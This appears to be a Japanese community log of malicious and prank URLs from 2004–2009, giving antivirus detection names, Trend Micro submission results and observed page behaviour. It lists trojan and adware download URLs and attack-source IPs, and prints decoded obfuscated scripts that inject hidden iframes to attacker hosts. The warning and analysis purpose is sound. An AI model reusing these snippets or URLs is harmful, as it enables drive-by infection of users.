| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2008/10/04] | ウィルス名:MAL_OLGM-15 |
| [2008/10/04] | ウィルス名:PAK_Generic.001 |
| [2008/10/04] | ウィルス名:CRYP_MANGLED |
| [2008/10/04] | ウィルス名:TROJ_DELF.EQE |
| [2008/10/04] | ウィルス名:POSSIBLE_VIRUS |
| [2008/10/04] | ウィルス名:MAL_BANLD-1 |
| [2008/10/04] | ウィルス名:POSSIBLE_VIRUS |
| [2008/10/18] | 2008/10/04 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:TROJ_DLOADE.DPU として検出するよう対応した、とのこと。 2008/10/04 にDLしたファイルからウィルス名:TROJ_DLOADE.DPU を検出することを確認。 しかし、今日改めてDLしようとするが、ファイルが無くなっていた。 |
| [2009/12/20] | 以下のファイルが落ちてくるが、このファイルはトロイの木馬である。
//www.safer-scan.com/SaferScanSetup.exe |
| [2009/12/20] | ファイルサイズ:478 KB 。ウィルス名:TROJ_GENERIC |
| [2009/01/05] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2009/12/20] | ファイルサイズ:679 KB 。ウィルス名:PAK_GENERIC.001 |
| [2009/12/20] | ファイルサイズ:1.50 MB 。不正プログラムの一種と思われる。 |
| [2008/10/18] | 2重拡張子である。2008/10/04 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:TROJ_DROPPER.KOD として検出するよう対応した、とのこと。 2008/10/04 にDLしたファイルからウィルス名:TROJ_DROPPER.KOD を検出することを確認。 しかし、今日改めてDLしようとするが、ファイルが無くなっていた。 |
| [2005/01/08] | 二次絵アダルトサイトだがウィルス名:VBS_PSYME.AP を検出。 |
| [2009/01/05] | 2重拡張子。ウィルス名:TROJ_AGENT.AFSC |
| [2005/02/24] | //karigirls.404servers.com/に飛び、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.K+JAVA_BYTEVER.A-1 を検出するが、何回か確認すると検出されるウィルス数が違う場合がある。
別窓で「WEB SEX SEARCH」という検索サイトを表示。 |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_VB.HUQ |
| [2006/08/25] | 2006/08/19 にトレンドマイクロ社にDL+解凍して現れた以下の3つのファイルを提出。
今日、その結果の連絡があり、以下のように検出するよう対応した、とのこと。 「fuck.exe」 → ウィルス名:TROJ_Generic.Z 「ld.exe」 → ウィルス名:TROJ_PRORAT.CB 「sexlaida.exe」 → ウィルス名:TROJ_Generic.Z 2006/08/19 にDLしたファイルからそれぞれのウィルスを検出することを確認。 また、今日改めて当該URLからDLしてみてもそれぞれのウィルスを検出することを確認。 |
| [2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
| [2006/10/16] | こんな感じ のサイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見るとIFRAMEタグで以下の5つのURLを呼び出している。
|
| [2008/10/04] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2006/06/03] | 踏むと真っ白なページ。バスター無反応だが、他アンチウィルスソフトでトロイの木馬が検出されるらしい。 |
| [2008/10/04] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2005/12/07] | 何回か確認。結果は以下。尚、確認した全てにおいて、ウィンドウサイズの変更を余儀なくされた。
1回目、ウィンドウサイズを小さくされ、そのウィンドウを表示する前に これ を表示。 「OK」「キャンセル」のどちらを選んでも これ を表示して、ダイアログを表示する。 それを拒否すると「WinFixer2005ScannerInstall_jp.exe」なるものをDLしろ、と言ってくる。 これ を閉じると、新たな これ を表示して、再び選択を迫ってくる。 「OK」「キャンセル」のどちらを選んでも次は これ を表示。「OK」を押すと これ を表示して「WinFixer2005ScannerInstall_jp.exe」をDLしろ、と言ってくる。 「WinFixer2005ScannerInstall_jp.exe」にはバスター無反応だが、以下のアンチウィルスソフトで反応。要するに「あなたのPCを修理+保護しますよ」とダマそうとしているスパイウェアexeである。 NOD32 → a variant of Win32/Downloader.Agent application Panda → Application/Winfixer2005 VBA32 → Downloader.Agent.1 2回目、これ を表示。普通に閉じれる。 3回目、これ を表示。普通に閉じれる。 4回目、これ を表示。普通に閉じれる。 5回目、1回目と同じ。 6回目、これ を表示。普通に閉じれる。 7回目、これ を表示。普通に閉じれる。 8回目、これ を表示。普通に閉じれる。 9回目、これ を表示。普通に閉じれる。 10回目、これ を表示。普通に閉じれる。 11回目、これ を表示。普通に閉じれる。 12回目、これ を表示。普通に閉じれる。 ↑ 3、4、6〜12回目では、アイコンやスクリーンセーバーがDLできるが、全てスパイウェアの一種:アドウェアが仕組まれている。 |
| [2006/01/22] | 他の方の結果は以下の「」内。
「大量のWin32:Adware-gen. [Adw]というアドウェアを送ってきます。インラインフレームタグを発見しました。 (368) 。明らかなブラクラです。IEでは危険です。。。」 |
| [2006/01/22] | IEで確認してみると、「win16.zip」という名前のファイルをDLしろ、というウィンドウが無数に開いていく。
DL後、解凍してみると、「win16」という名前のメモ帳が出来る。しかし、普通のテキストファイルで、普通に見れる。 |
| [2006/01/13] | 踏むと //www.easypic.org/?sample01.jpg に飛ぶ。
ウィルス名:TROJ_ANICMOO.X+EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC 他の方の結果では「Trojan-Downloader.JS.Agent.i 検出。」 |
| [2006/08/29] | 2006/08/22 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BNK として検出するよう対応、とのこと。 2006/08/22 にDLしたファイルからウィルス名:CHM_DROPPER.BNK を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BNK を検出することを確認。 |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/08/30] | ウィルス名:CHM_CODEBASE.DB |
| [2006/08/20] | ウィルス名:CHM_SMALL.RT |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/08/30] | ウィルス名:CHM_CODEBASE.DB |
| [2006/08/29] | 2006/08/22 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BNK として検出するよう対応、とのこと。 2006/08/22 にDLしたファイルからウィルス名:CHM_DROPPER.BNK を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BNK を検出することを確認。 |
| [2006/08/30] | ウィルス名:CHM_DROPPER.BNK |
| [2006/09/13] | 2006/08/30 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_DROPPER.BOC として検出するよう対応、とのこと。 2006/08/30 にDLしたファイルからウィルス名:CHM_DROPPER.BOC を検出することを確認。 また、当該URLからDLしてみてもウィルス名:CHM_DROPPER.BOC を検出することを確認。 |
| [2005/07/04] | ウィルス名:JS_MHTREDIR.P+JAVA_BYTEVER.A |
| [2005/12/23] | スパイウェアの一種:アドウェアである。スタートページの改ざんも行うらしい。
バスター無反応だが、以下のアンチウィルスソフトで反応。 Avast → Win32:Adware-gen. Dr.Web → Adware.IESearch, Adware.Dialhelp Fortinet → Adware/DealHelper Kaspersky → not-a-virus:AdWare.Win32.MDH.e, not-a-virus:AdWare.Win32.SearchFast.a VBA32 → AdWare.SearchFast.a |
| [2006/01/17] | スパイウェアサイト。こんな感じ のサイトだが、何かをインストールするよう催促される。インストールするとスタートページをハイジャックされるらしい。 |
| [2006/01/17] | DL+解凍後のファイルの中にある「toolbar.dll」からアドウェアを検出。
ClamAV → Adware.Toolbar-10 Kaspersky Anti-Virus → not-a-virus:AdWare.Win32.SearchIt.c |
| [2006/07/17] | ウィルス名:TROJ_ADCLICK.F |
| [2006/05/07] | スパイウェア配布サイト。こんな感じ のサイト。このページ表示まで無害で普通に閉じれる。
このページ内の「Download Toolbar」というボタンをクリックすると以下のexeをDL出来るが、ウィルスを検出。 //www.acez.com/downloads/webtools/searchnugget.exe |
| [2005/11/24] | 踏むと真っ白なページだが、左上のほうに何かを呼び出している形跡がある。
そして、ダイアログを表示し、ウィルス名:ADW_SQUIRE.A を検出。 |
| [2005/11/24] | 踏むと こんな感じ のページだが、ダイアログを表示し、ウィルス名:ADW_SQUIRE.Aを検出。 |
| [2005/11/24] | ウィルス名:ADW_SQUIRE.A |
| [2005/11/24] | 踏むと こんな感じ のページだが、このダイアログ を表示し、拒否すると こんなページ を表示する。
調べると、このダイアログ では、許可すると下のcabファイルをDL+インストールさせられる。 //www.searchwords.com/toolbar/swbar.cab このcabファイルを解凍すると「swbar.dll」なるものが現れる。バスター無反応だが、VBA32 で Trojan.Delf.18 を検出。実行してみるとエラー+実行不可で、それ以上の詳細は不明であった。 Internet Explorerツールバーで、検索リクエストを変更し、広告を表示するものらしい。 |
| [2005/11/24] | DL+解凍すると「swbar.dll」なるものが現れる。バスター無反応だが、VBA32 で Trojan.Delf.18 を検出。 |
| [2005/07/24] | 新型?ブラウザ落とし。 |
| [2005/07/25] | 65500x1ピクセルのブラウザを異常終了させる画像。
IEで踏むとブラウザ今強制終了。FirefoxとかOperaなら無害。 |
| [2005/07/25] | セキュリティ情報サイトが脆弱性の検証用に置いているファイル。
> Internet Explorer 系のエンジンで表示すると異常終了。現状では対策パッチはまだ出ていない。 > ウィルスではない。それ自体は効率的なブラクラだけで他の害はない。 > 元記事 |
| [2005/07/25] | 今回は他にも脆弱性が複数あってサンプルコードも出てて、かつ現状で未対策なので似たような URL の画像が貼られてたら注意。
関連記事 → IEに未パッチの脆弱性4種、実証コードあり |
| [2008/10/18] | 2008/10/04 にトレンドマイクロ社にファイルを提出。
今日、連絡があり、ウィルス名:TROJ_DLOADE.DMH として検出するよう対応した、とのこと。 2008/10/04 にDLしたファイルからウィルス名:TROJ_DLOADE.DMH を検出することを確認。 しかし、今日改めて確認してみると、ウィルス名:PAK_GENERIC.001 を検出する。 |
| [2009/01/04] | 再確認。ウィルス名:TROJ_VUNDO.MCS を検出。不定期的にファイルの置き換えを行っているものと思われる。 |
| [2005/03/03] | ウィルス名:JAVA_BYTEVER.A。未検出の場合もある。 |
| [2005/02/07] | SPYBOT反応:FastClick+XXXToolbar。2回目と3回目の確認ではXXXToolbarのみ。
遮断すると警告表示。「Click YES to upgrade your Microsoft Internet Explorer Now !」 警告表示の「OK」を押すとブラウザフリーズ。強制終了で脱出。 IFRAMEタグで//gb.bbs.ws/book.php?book=xoxを呼び出している。 3回目の確認でウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.A-1を検出。 |
| [2005/02/08] | 他の鑑定結果ではウィルス名:TROJ_SMALL.XO+JAVA_BYTEVER.A+JAVA_BYTEVER.B+JAVA_BYTEVER.C |
| [2008/10/04] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
| [2006/10/29] | ウィルス名:EXPL_EXECOD.A |
| [2006/10/14] | ウィルス名:TROJ_AGENT.FLO 。ノートンではウィルス名:Trojan.Nebuler を検出する。 |
| [2006/11/09] | 2006/11/07 にトレンドマイクロ社に各ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GUN として検出するよう対応、とのこと。 実際に 2006/11/07 にDLしたファイルからウィルス名:TROJ_DLOADER.GUN を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DLOADER.GUN を検出することを確認。 |
| [2007/01/10] | 2006/12/21 にトレンドマイクロ社にファイルを提出。
2006/12/29 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.FOX として検出するよう対応、とのこと。 実際に 2006/12/21 にDLしたファイルからウィルス名:TROJ_DLOADER.FOX を検出することを確認。 しかし、2006/12/29 に再度DLしたファイル、今日改めてDLしたファイルにはバスター無反応。 2006/12/21 から 2006/12/29 までの間にファイルの置き換えがあったと思われる。 |
| [2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.DIC として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルからウィルス名:TROJ_SMALL.DIC を検出することを確認。 しかし、今日改めてDLしたファイルにはバスター無反応。 2007/01/13 から今日までの間にファイルの置き換えがあったと思われる。 |
| [2006/11/15] | 2006/10/30 にトレンドマイクロ社にファイルを提出。
今日までに結果の連絡は無かったが、ウィルス名:TROJ_AGENT.FEN として対応してくれた模様。 2006/10/30 にDLしたファイルからウィルス名:TROJ_AGENT.FEN を検出。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 新しいファイルに置き換えられている。 |
| [2007/01/10] | 2006/12/21 にトレンドマイクロ社にファイルを提出。
2006/12/29 にその結果の連絡があり、ウィルス名:TROJ_DLOADER.FOX として検出するよう対応、とのこと。 しかし、実際に 2006/12/21 にDLしたファイルからはウィルス名:TROJ_AGENT.IZD を検出。 しかも、2006/12/29 に再度DLしたファイル、今日改めてDLしたファイルにはバスター無反応。 2006/12/21 から 2006/12/29 までの間にファイルの置き換えがあったと思われる。 |
| [2007/01/19] | 2007/01/13 にトレンドマイクロ社にファイルを再提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.DIC として検出するよう対応、とのこと。 実際に 2007/01/13 にDLしたファイルからウィルス名:TROJ_SMALL.DIC を検出することを確認。 しかし、今日改めてDLしたファイルにはバスター無反応。 2007/01/13 から今日までの間にファイルの置き換えがあったと思われる。 |
| [2006/11/09] | 2006/11/07 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GUN として検出するよう対応、とのこと。 実際に 2006/11/07 にDLしたファイルからウィルス名:TROJ_DLOADER.GUN を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_DLOADER.GUN を検出することを確認。 |
| [2006/10/20] | 2006/10/16 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_SMALL.DIO として検出するよう対応、とのこと。 実際に 2006/10/16 にDLしたファイルからウィルス名:TROJ_SMALL.DIO を検出することを確認。 また、今日改めて当該URLからDLしてみてもファイルからウィルス名:TROJ_SMALL.DIO を検出することを確認。 |
| [2007/02/19] | ウィルス名:TROJ_DLOADER.EZO |
| [2007/03/07] | 2006/10/09 にトレンドマイクロ社にファイルを提出。
2006/10/16 にその結果の連絡があり、ウィルス名:TROJ_DIALER.JP として検出するよう対応、とのこと。 2006/10/09 にDLしたファイルは消去してしまって未確認。 しかも、今日改めて当該URLを確認してみると404であった。 |
| [2006/08/02] | ウィルス名:DIAL_MOLDCON.A |
| [2005/06/17] | 海外アダルトサイト。ウィルス名:JAVA_BYTEVER.A-1
ソースの中に以下の『ラテン-1文字コード』(数字の部分)がある。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,115,114,99, 61,39,104,116,116,112,58,47,47,56,50,46,49,55,57,46,49,55,48,46,49,49,47,49,48,48,48,48,53,47,39,32, 115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62,60,47,105,102,114,97, 109,101,62,34,41))</script> ↑ これの数字の部分を読めるようにすると以下のスクリプトが現れる。 ↓ document.write("<iframe src='http://82.179.170.11/100005/' style='display:none'></iframe>") |
| [2005/06/17] | 海外アダルトサイト。ウィルス名:JAVA_BYTEVER.A。別窓はこれ → //www.10fuck.com/
ソースの中に以下のコード変換された部分がある。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97, 109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104,61,48,32,104, 101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100,105,115,112,108,97, 121,58,110,111,110,101,39,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111, 111,108,119,101,98,115,101,97,114,99,104,120,46,98,105,122,47,107,111,114,110, 47,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を読めるようにすると下のようなスクリプトが現れる。 ↓ document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://coolwebsearchx.biz/korn/'></iframe>") |
| [2005/08/23] | 海外アダルトサイトだが、バスター無反応。ページ更新されている模様。 |
| [2005/11/27] | 2chでの結果は以下の「」内。
「洋エロサイトのサムネイルいっぱいのページ。サムネイルクリックでランダムに他の洋エロサイトへ飛びます。当環境ではノートン無反応ですが、この様なサイトは踏まないほうが吉。」 |
| [2005/12/08] | 海外アダルトサイトで、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.ACを検出。
但し、何回か確認してみると、ウィルス未検出の時もあった。 閉じると以下の2つのURLを新窓表示。2つとも普通に閉じれた。 //www.alfasearch.net/ ← 検索サイトのよう。 //girlsinferno.pornwall.info/ ← 海外アダルトサイト。 |
| [2005/08/20] | 海外アダルトサイト。このページは無害だが、ページを閉じるとブラクラ並に色々なアダルトサイトが開く。その中にウィルス憑きサイトが含まれている。 |
| [2005/04/09] | ウィルス名:TROJ_ANICMOO.D+JAVA_BYTEVER.A+JAVA_BYTEVER.C |
| [2006/09/01] | DL+解凍すると「XDial.ocx」なるファイルが現れる。
バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → DIAL/98304.A.7 AVG → Potentially harmful program Dialer.CFS Ewido → Dialer.XDial.a Kaspersky → not-a-virus:Porn-Dialer.Win32.XDial.a TheHacker → Trojan/Dialer.XDial.a UNA → Dialer.XDial VBA32 → Porn-Dialer.Win32.XDial.a 2006/08/26 にトレンドマイクロ社に「XDial.ocx」ファイルを提出。 2006/08/31 にその結果の連絡があり、「単体では不正な活動を行わないファイルであり、弊社では対応は行わない」とのこと。 |
| [2006/08/03] | 2006/07/26 にトレンドマイクロ社に「Alizee.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.AF として検出するよう対応とのこと。 当該URLからファイルをDLしてウィルス名:DIAL_CDDIAL.AF を検出することを確認。 |
| [2007/01/23] | 2006/12/17 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.EQ として検出するよう対応、とのこと。 実際に 2006/12/17 にDLしたファイルからウィルス名:DIAL_CDDIAL.EQ を検出することを確認。 しかし、今日改めて当該URLからDLしてみるとバスター無反応。 2006/12/17 から今日までの間にファイルの置き換えがあったと推測される。 |
| [2005/03/26] | ウィルス名:TROJ_AQ.A |
| [2005/03/26] | ウィルス名:DIAL_CONNECT.A |
| [2006/10/27] | 2006/10/15 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:CHM_AGENT.IAW として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:CHM_AGENT.IAW を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:CHM_AGENT.IAW を検出することを確認。 |
| [2005/03/26] | ウィルス名:ADW_MEDTICKS.A |
| [2005/06/12] | 解凍すると以下の2つのファイルが現れる。共にバスター無反応。
1、「18.INF」 ← セットアップ情報。無害。 2、「ladda.exe」 ← トロイの木馬。 「ladda.exe」は以下のアンチウィルスソフトで反応。 Dr.Web → Trojan.DownLoader.2355 Kaspersky Anti-Virus → Trojan-Downloader.Win32.VB.cp VBA32 → Trojan-Downloader.Win32.VB.cp |
| [2005/06/12] | 「ladda.exe」はWin9x系とWinNTで動作するウェブダイヤラー。VBSウィルスらしい。 |
| [2007/03/07] | 2006/10/15 にトレンドマイクロ社に中身の「ladda.exe」ファイルを提出。
2006/10/27 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。 2006/10/15 から今日まではファイルは置き換えられていないと推測される。 |
| [2005/04/13] | ウィルス名:TROJ_SMALL.TH |
| [2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「Information.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.KP として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_DIALER.KP を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_DIALER.KP を検出することを確認。 |
| [2006/10/27] | 2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「Information.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.OB として検出するよう対応、とのこと。 実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_DIALER.OB を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_DIALER.OB を検出することを確認。 |
| [2006/10/15] | ウィルス名:DIAL_T.A |
| [2004/11/08] | ウィルス名:HTML_REDIR.A+JAVA_BYTEVER.A+JAVA_BYTEVER.A-1
エロサイトが次々と開き始め、ウィルスを検出。 |
| [2005/04/10] | 踏むと画像そのものではなく、サムネイル画像+リンクページ。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.M 別窓で//www.perfect-lovers.com/index.htmlを表示。共に普通に閉じれる。 |
| [2005/06/26] | 改めて確認。404になっている。 |
| [2005/06/27] | 再確認。404ではなく、ウィルス憑きサイトに戻っている。
404確認時は「?sample01.jpg」を削ってindex.htmlページを確認したら存在したので、サーバーの状態が不安定だったのではなく、「//www.sexhunter.org/?sample01.jpg」←このページをサイト管理者側で一時的に削除したものと思われる。 |
| [2005/07/03] | −以下は2chでのこのURLを踏んだ方の症状を編集して掲載−
「ここのアドレスへ行ってしまったらウイルスらしきものに感染してしまいました。当方WinXPです。ホームが変えられたらしく、インターネットオプションの「全般」で修正しても毎回強制的に違うHPにつながれてしまいます。動作もかなり重くなってしまいました。」 しかし、システムの復元で何とか回避出来たらしい。 |
| [2005/07/06] | 以下は他の方の鑑定結果。
「まず開くと、新ウィンドウが2つ作られる。 そして、トロイの木馬型ウィルスを数種類検出。その後、「web.exe」というハイジャッカーをインストールさせようとしてくる(ウイルス2種混入)。 英文のアラートダイアログを表示し、キャンセルを押せば問題なく終了。IEでは制限サイトに指定されているため、セキュリティ警告などは無出現。 スパイウェア・ウィルス対策が施されていないコンピュータの場合は、高危険度。」 |
| [2005/07/03] | バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → TR/Dldr.P-Woods.2 ArcaVir → Trojan.Startpage.Pz AVG Antivirus → Startpage.18.AX BitDefender → Trojan.Startpage.PZ ClamAV → Trojan.Startpage-201 Dr.Web → Trojan.StartPage.356 F-Prot Antivirus → W32/Startpage.OD Kaspersky Anti-Virus → Trojan.Win32.StartPage.pz NOD32 → Win32/StartPage.PZ Norman Virus Control → W32/Startpage.AED UNA → Trojan.Win32.StartPage VBA32 → Trojan.Win32.StartPage.pz |
| [2005/07/14] | 踏むと//lolitas-teens.com/?sexhunter.orgに飛ぶ。
暫らくして//teensspace.com/?lolitas-teens.comを新窓表示。 そしてウィルス名:JAVA_BYTEVER.Aを検出。 |
| [2005/10/04] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
| [2005/11/04] | 海外アダルトサイト。ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A |
| [2005/07/15] | 海外アダルトサイト。このページは無害だが、閉じると別のアダルトサイトが全画面で2枚表示してウィルス名:JAVA_BYTEVER.A を検出。 |
| [2005/10/07] | 再確認。海外アダルトサイト。閉じると全画面表示を2枚表示。そのうち1枚はアダルトサイト、もう1枚は「ページを表示できません」となる。
同時にウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.Aを検出。 |
| [2005/10/09] | 再確認。海外アダルトサイト。このページ表示まで無害と思われる。
しかし、閉じるとランダムに海外アダルトサイトを全画面表示する。 全画面表示されるサイトのいくつかはウィルス憑きサイトである。運が良ければウィルス無しのサイトを表示するが、運が悪ければウィルス憑きサイトを表示する。 私が何回か確認した結果は、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A を複数検出したサイトもあれば、ウィルス名:JS_INOR.AB を検出したサイトもあった。 ウィルス憑きサイトを全画面表示する確率は大体3割程度と判断。 |
| [2005/08/23] | FDDアタックの後、「about_blank」の無限ウィンドウオープン。 |
| [2004/11/23] | 踏むといきなりSPYBOT反応:SexTracker。遮断すると海外エロサイト表示。 |
| [2005/04/17] | ウィルス名:TROJ_TORAS.B |
| [2007/02/21] | 2007/02/19 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_DLOADER.GRT として検出するよう対応、とのこと。 実際に 2007/02/19 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOADER.GRT を検出することを確認。 2007/02/19 から今日までのファイルの置き換えは無いと推測される。 |
| [2004/08/15] | ウィルス名:TROJ_SCTHOUGHT.C
外国の女優の画像、キャメロン・ディアスの壁紙が置いてあるページだがスパイウェアのDLあり。 このリンク先にアクセスして同意するに「yes」押してしまうとPCを使ってる間、一定期間ごとに変なウインドウが出てくる場合あり。 |
| [2005/03/13] | ウィルス名:JAVA_BYTEVER.A を検出。これは classload.jar を実行しようとするため。
閉じると「99bb月額見放題」なる日本語エロサイトを表示するが、何回も確認しているうちに別の日本語アダルトサイト //www.dreamteenmovies.com/japans.html を表示する。 稀に //freehost.rambler.cc/users/japangirls/ の日本語アダルトサイトも表示する。 //www.sexyteams.com/ には別窓が付いているが表示されるものはランダムらしい。 20回ほど確認。以下が表示された別窓のURLと解説。表示される別窓は他にもありそう。
|
| [2005/03/13] | ウィルス名:JAVA_BYTEVER.A |
| [2004/10/28] | ウィルス名:HTML_REDIR.A |
| [2008/11/17] | 海外アダルトサイト。このページ表示までバスター無反応で、普通に閉じれる。
以下の他の方の結果を参照のこと。 「sexywebcam.com というタイトルのスペインのアダルト系出会い系サイトへいきました。 当環境ではそこまで Kaspersky 無反応ですが、画像をクリックするといきなり怪しいアラートオープンが表示されたり怪しかったのでマカフィーアドバイザーで調べてみるとアドウェア・スパイウェア・ウイルスサイトとの警告のレビューがありました。踏まない方がいいでしょう。」 |
| [2006/01/12] | ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y 。「as.wmf」をDLしろ、と言ってくる。
ソースを見ると、Location ヘッダで、以下の @ に飛び、更に A に飛ぶ。 @、//1800-search.com/closed.php A、//1800-search.com/as.wmf |
| [2007/05/27] | ウィルス名:Dialer_PetroLine |
| [2009/05/12] | ファイルサイズ:1.76 MB 。ウィルス名:BKDR_GENERIC.DIT |
| [2007/01/21] | ウィルス名:WORM_APPFLET.B |
| [2006/08/24] | ウィルス名:ADW_SAHAGENT.F |
| [2006/08/24] | ウィルス名:PE_Generic+ADW_SAHAGENT.H |
| [2006/08/24] | ウィルス名:ADW_SAHAGENT.AC |
| [2008/10/04] | 2重拡張子。ウィルス名:TROJ_AGENT.AULZ |
| [2004/05/17] | 洋炉エロサイトリンク集だが環境によりスパイウェアの可能性。 |
